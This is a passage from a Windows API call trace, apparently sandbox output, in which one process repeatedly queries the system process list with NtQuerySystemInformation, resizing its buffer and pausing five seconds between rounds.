SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.948] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.955] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.961] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.968] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.975] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.985] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.992] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.999] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.007] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.014] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.021] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.048] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.056] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.064] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.071] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.079] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.085] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.093] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.101] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.132] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.140] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 